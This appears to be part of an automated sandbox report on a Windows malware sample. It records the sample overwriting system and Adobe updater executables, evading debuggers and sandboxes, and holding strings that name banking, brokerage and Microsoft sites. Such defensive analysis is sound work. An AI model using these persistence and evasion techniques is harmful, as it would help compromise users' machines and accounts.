Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B78550 push 00B7808Ch; ret	0_2_00B78512
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B78550 push 00B78B6Fh; ret	0_2_00B78596
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B78550 push 00B78E94h; ret	0_2_00B785C9
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B78550 push 00B7878Bh; ret	0_2_00B78734
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B78550 push 00B78D45h; ret	0_2_00B787D3
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B78550 push 00B78E5Fh; ret	0_2_00B7885F
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B78550 push 00B78AB5h; ret	0_2_00B78B13
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B78550 push 00B78784h; ret	0_2_00B78CA1
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B78550 push 00B78DC9h; ret	0_2_00B78E1C
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B78550 push 00B78D14h; ret	0_2_00B78E2E

Source: uG3I84bQEr.exe	Static PE information: section name: .reloc entropy: 7.9380417991201515
Source: AppVClient.exe.0.dr	Static PE information: section name: .reloc entropy: 7.943011846665762

Persistence and Installation Behavior

Drops executable to a common third party application directory

Source: C:\Users\user\Desktop\uG3I84bQEr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\Desktop\uG3I84bQEr.exe	System file written: C:\Windows\System32\AppVClient.exe	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	System file written: C:\Windows\System32\alg.exe	Jump to behavior

Source: C:\Users\user\Desktop\uG3I84bQEr.exe	File created: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	File created: C:\Windows\System32\alg.exe	Jump to dropped file

Source: C:\Users\user\Desktop\uG3I84bQEr.exe	File created: C:\Windows\System32\AppVClient.exe			Jump to dropped file
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	File created: C:\Windows\System32\alg.exe			Jump to dropped file

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Code function: 0_2_00B7CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,

0_2_00B7CBD0

Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_004048D7
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00485376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00485376

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Code function: 0_2_00423187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00423187

Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\uG3I84bQEr.exe	API/Special instruction interceptor: Address: DD9C2C
Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FFDB442D7E4
Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\bitsadmin.exe	API/Special instruction interceptor: Address: 7FFDB442DA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 3_2_0307096E rdtsc

3_2_0307096E

Source: C:\Windows\SysWOW64\bitsadmin.exe

Window / User API: threadDelayed 9845

Jump to behavior

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Dropped PE file which has not been started: C:\Windows\System32\AppVClient.exe

Jump to dropped file

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Evaded block: after key decision

graph_0-111699

Source: C:\Users\user\Desktop\uG3I84bQEr.exe	API coverage: 5.2 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.6 %

Source: C:\Users\user\Desktop\uG3I84bQEr.exe TID: 2448	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe TID: 7000	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 3472	Thread sleep count: 127 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 3472	Thread sleep time: -254000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 3472	Thread sleep count: 9845 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 3472	Thread sleep time: -19690000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\bitsadmin.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\bitsadmin.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0046445A
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_0046C6D1 FindFirstFileW,FindClose,	0_2_0046C6D1
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0046C75C
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0046EF95
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0046F0F2
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0046F3F3
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_004637EF
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00463B12
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0046BCBC

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Code function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004049A0

Source: z5f52P3-.7.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: z5f52P3-.7.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: z5f52P3-.7.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: z5f52P3-.7.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: z5f52P3-.7.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: z5f52P3-.7.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: uG3I84bQEr.exe, 00000000.00000002.2247618432.0000000000DBA000.00000004.00000020.00020000.00000000.sdmp, uG3I84bQEr.exe, 00000000.00000002.2247870943.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: z5f52P3-.7.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: z5f52P3-.7.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: z5f52P3-.7.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: z5f52P3-.7.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: z5f52P3-.7.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: z5f52P3-.7.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: bGPwjAWMEtES.exe, 00000006.00000002.3472111395.000000000120E000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3470880703.0000000002E12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: z5f52P3-.7.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: z5f52P3-.7.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: z5f52P3-.7.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: z5f52P3-.7.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: z5f52P3-.7.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: bitsadmin.exe, 00000007.00000002.3474681876.0000000007B33000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: nsaction PasswordVMware20,11696487552}
Source: z5f52P3-.7.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: bitsadmin.exe, 00000007.00000002.3474681876.0000000007B33000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .comVMware20,1162
Source: z5f52P3-.7.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: z5f52P3-.7.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: bitsadmin.exe, 00000007.00000002.3474681876.0000000007B33000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ice.comVMware20,#
Source: z5f52P3-.7.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: firefox.exe, 0000000A.00000002.2816073834.0000021D4B7AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
Source: z5f52P3-.7.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: z5f52P3-.7.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: z5f52P3-.7.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: z5f52P3-.7.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: z5f52P3-.7.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: z5f52P3-.7.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: z5f52P3-.7.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: z5f52P3-.7.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: bitsadmin.exe, 00000007.00000002.3474681876.0000000007B33000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tVMware20,116964
Source: z5f52P3-.7.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: z5f52P3-.7.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\bitsadmin.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 3_2_0307096E rdtsc

3_2_0307096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 3_2_00517B23 LdrLoadDll,

3_2_00517B23

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Code function: 0_2_00473F09 BlockInput,

0_2_00473F09

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Code function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00403B3A

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Code function: 0_2_00435A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00435A7C

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Code function: 0_2_00404B37 LoadLibraryA,GetProcAddress,

0_2_00404B37

Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_0056C594 mov eax, dword ptr fs:[00000030h]	0_2_0056C594
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B51130 mov eax, dword ptr fs:[00000030h]	0_2_00B51130
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B93F3D mov eax, dword ptr fs:[00000030h]	0_2_00B93F3D
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00DD8818 mov eax, dword ptr fs:[00000030h]	0_2_00DD8818
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00DD9EF8 mov eax, dword ptr fs:[00000030h]	0_2_00DD9EF8
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00DD9E98 mov eax, dword ptr fs:[00000030h]	0_2_00DD9E98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306A30B mov eax, dword ptr fs:[00000030h]	3_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306A30B mov eax, dword ptr fs:[00000030h]	3_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0306A30B mov eax, dword ptr fs:[00000030h]	3_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0302C310 mov ecx, dword ptr fs:[00000030h]	3_2_0302C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03050310 mov ecx, dword ptr fs:[00000030h]	3_2_03050310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03108324 mov eax, dword ptr fs:[00000030h]	3_2_03108324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03108324 mov ecx, dword ptr fs:[00000030h]	3_2_03108324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03108324 mov eax, dword ptr fs:[00000030h]	3_2_03108324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03108324 mov eax, dword ptr fs:[00000030h]	3_2_03108324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]	3_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]	3_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]	3_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]	3_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]	3_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]	3_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]	3_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]	3_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]	3_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]	3_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]	3_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]	3_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]	3_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]	3_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]	3_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B035C mov eax, dword ptr fs:[00000030h]	3_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B035C mov eax, dword ptr fs:[00000030h]	3_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B035C mov eax, dword ptr fs:[00000030h]	3_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B035C mov ecx, dword ptr fs:[00000030h]	3_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B035C mov eax, dword ptr fs:[00000030h]	3_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B035C mov eax, dword ptr fs:[00000030h]	3_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030FA352 mov eax, dword ptr fs:[00000030h]	3_2_030FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030D8350 mov ecx, dword ptr fs:[00000030h]	3_2_030D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0310634F mov eax, dword ptr fs:[00000030h]	3_2_0310634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030D437C mov eax, dword ptr fs:[00000030h]	3_2_030D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0302E388 mov eax, dword ptr fs:[00000030h]	3_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0302E388 mov eax, dword ptr fs:[00000030h]	3_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0302E388 mov eax, dword ptr fs:[00000030h]	3_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0305438F mov eax, dword ptr fs:[00000030h]	3_2_0305438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0305438F mov eax, dword ptr fs:[00000030h]	3_2_0305438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03028397 mov eax, dword ptr fs:[00000030h]	3_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03028397 mov eax, dword ptr fs:[00000030h]	3_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03028397 mov eax, dword ptr fs:[00000030h]	3_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030EC3CD mov eax, dword ptr fs:[00000030h]	3_2_030EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	3_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030383C0 mov eax, dword ptr fs:[00000030h]	3_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030383C0 mov eax, dword ptr fs:[00000030h]	3_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030383C0 mov eax, dword ptr fs:[00000030h]	3_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030383C0 mov eax, dword ptr fs:[00000030h]	3_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B63C0 mov eax, dword ptr fs:[00000030h]	3_2_030B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030DE3DB mov eax, dword ptr fs:[00000030h]	3_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030DE3DB mov eax, dword ptr fs:[00000030h]	3_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030DE3DB mov ecx, dword ptr fs:[00000030h]	3_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030DE3DB mov eax, dword ptr fs:[00000030h]	3_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030D43D4 mov eax, dword ptr fs:[00000030h]	3_2_030D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030D43D4 mov eax, dword ptr fs:[00000030h]	3_2_030D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030403E9 mov eax, dword ptr fs:[00000030h]	3_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030403E9 mov eax, dword ptr fs:[00000030h]	3_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030403E9 mov eax, dword ptr fs:[00000030h]	3_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030403E9 mov eax, dword ptr fs:[00000030h]	3_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030403E9 mov eax, dword ptr fs:[00000030h]	3_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030403E9 mov eax, dword ptr fs:[00000030h]	3_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030403E9 mov eax, dword ptr fs:[00000030h]	3_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030403E9 mov eax, dword ptr fs:[00000030h]	3_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0304E3F0 mov eax, dword ptr fs:[00000030h]	3_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0304E3F0 mov eax, dword ptr fs:[00000030h]	3_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0304E3F0 mov eax, dword ptr fs:[00000030h]	3_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030663FF mov eax, dword ptr fs:[00000030h]	3_2_030663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0302823B mov eax, dword ptr fs:[00000030h]	3_2_0302823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B8243 mov eax, dword ptr fs:[00000030h]	3_2_030B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030B8243 mov ecx, dword ptr fs:[00000030h]	3_2_030B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0310625D mov eax, dword ptr fs:[00000030h]	3_2_0310625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0302A250 mov eax, dword ptr fs:[00000030h]	3_2_0302A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03036259 mov eax, dword ptr fs:[00000030h]	3_2_03036259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030EA250 mov eax, dword ptr fs:[00000030h]	3_2_030EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030EA250 mov eax, dword ptr fs:[00000030h]	3_2_030EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03034260 mov eax, dword ptr fs:[00000030h]	3_2_03034260
